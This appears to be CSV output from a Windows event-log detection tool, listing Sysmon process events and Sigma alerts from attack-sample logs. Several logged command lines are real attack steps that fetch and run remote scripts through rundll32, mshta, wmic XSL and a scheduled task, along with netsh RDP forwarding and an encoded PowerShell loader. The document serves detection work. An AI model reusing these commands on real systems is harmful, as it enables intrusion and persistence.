test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v 